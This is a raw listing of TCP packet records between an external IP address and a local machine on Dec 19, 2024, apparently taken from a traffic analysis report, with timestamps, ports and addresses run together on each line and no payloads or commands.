                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.378658056 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.378782034 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.378869057 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.379838943 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.379874945 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.380111933 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.381045103 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.381263018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.382232904 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.382333040 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.382342100 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.382406950 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.383449078 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.383558035 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.383639097 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.384422064 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.384788036 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.384840012 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.385497093 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.385637999 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.385843039 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.387209892 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.387412071 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.387526035 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.388338089 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.388446093 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.388573885 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.389316082 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.389455080 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.389636993 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.390350103 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.390403032 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.391185045 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.391263962 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.391345024 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.391454935 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.392568111 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.392662048 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.392704010 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.393330097 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.393382072 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.393517971 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.394399881 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.394623041 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.395669937 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.395704985 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.395751953 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.395751953 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.396636963 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.396905899 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.396974087 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.397727966 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.397857904 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.397980928 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.398850918 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.398997068 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.399082899 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.400290012 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.400466919 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.401114941 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.401166916 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.401199102 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.401242971 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.402211905 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.402370930 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.402678967 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.403431892 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.403592110 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.403647900 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.404758930 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.404947042 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.405061960 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.405746937 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.406095028 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.406790972 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.406888008 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.406939983 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.407004118 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.407810926 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.407918930 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.408442020 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.409039021 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.409281969 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.409320116 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.410120010 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.410154104 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.410212040 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.411216974 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.411271095 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.412426949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.412496090 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.412530899 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.412600994 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.413419962 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.413604975 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.414527893 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.414623976 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.414628029 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.414690018 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.415662050 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.415714025 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.415774107 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.416774988 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.416810989 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.416897058 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.417881012 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.418005943 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.418087006 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.419311047 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.465856075 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.553438902 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.553581953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.553636074 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.553916931 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.554027081 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.554130077 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.554842949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.554896116 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.554959059 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.555886984 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.556243896 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.556303978 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.557027102 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.557080030 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.557384014 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.558141947 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.558193922 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.558275938 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.559221029 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.559370041 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.559431076 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.560347080 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.560445070 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.560523033 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.561471939 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.561561108 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.561620951 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.562676907 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.562728882 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.562774897 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565161943 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565273046 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565308094 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565341949 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565449953 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565449953 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.565968990 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.566061020 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.566123009 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.567123890 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.567174911 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.567262888 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.568267107 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.568361044 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.568418026 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.569341898 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.569405079 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.569467068 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.570472002 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.570539951 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.570713997 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.571553946 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.571695089 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.571748018 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582055092 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582088947 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582123995 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582170010 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582231998 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582264900 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582299948 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582304001 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582403898 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582727909 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582762957 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582796097 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582833052 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582901955 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.582901955 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583112955 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583146095 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583179951 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583201885 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583214045 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583544970 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583578110 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583590031 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583631992 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583667040 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583717108 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583827019 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583828926 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583863020 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583930016 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583978891 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.583993912 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.584044933 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.585017920 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.585086107 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.585253954 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.586224079 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.586375952 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.586427927 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.587551117 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.587585926 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.587639093 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.588654041 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.588686943 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.588875055 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.589637041 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.589750051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.589822054 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.590783119 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.590881109 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.591048002 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.591716051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.591810942 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.592014074 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.592854977 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.592962027 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.593054056 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.594003916 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.594038963 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.594089985 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.595119953 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.595172882 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.596230984 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.596265078 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.596287012 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.596337080 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.597337961 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.597460032 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.597520113 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.598448038 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.598571062 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.598660946 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.599565983 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.599627018 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.600671053 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.600722075 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.600749016 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.600791931 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.601799965 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.601851940 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.601919889 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.602977991 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.603071928 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.603213072 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.604047060 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.604156971 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.604250908 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.605148077 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.605314970 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.605365038 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.606268883 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.606358051 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.606462002 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.607502937 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.607558966 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.607605934 CET499012845192.168.2.5104.161.43.18
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.608494997 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.608619928 CET284549901104.161.43.18192.168.2.5
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:45:12.609639883 CET284549901104.161.43.18192.168.2.5
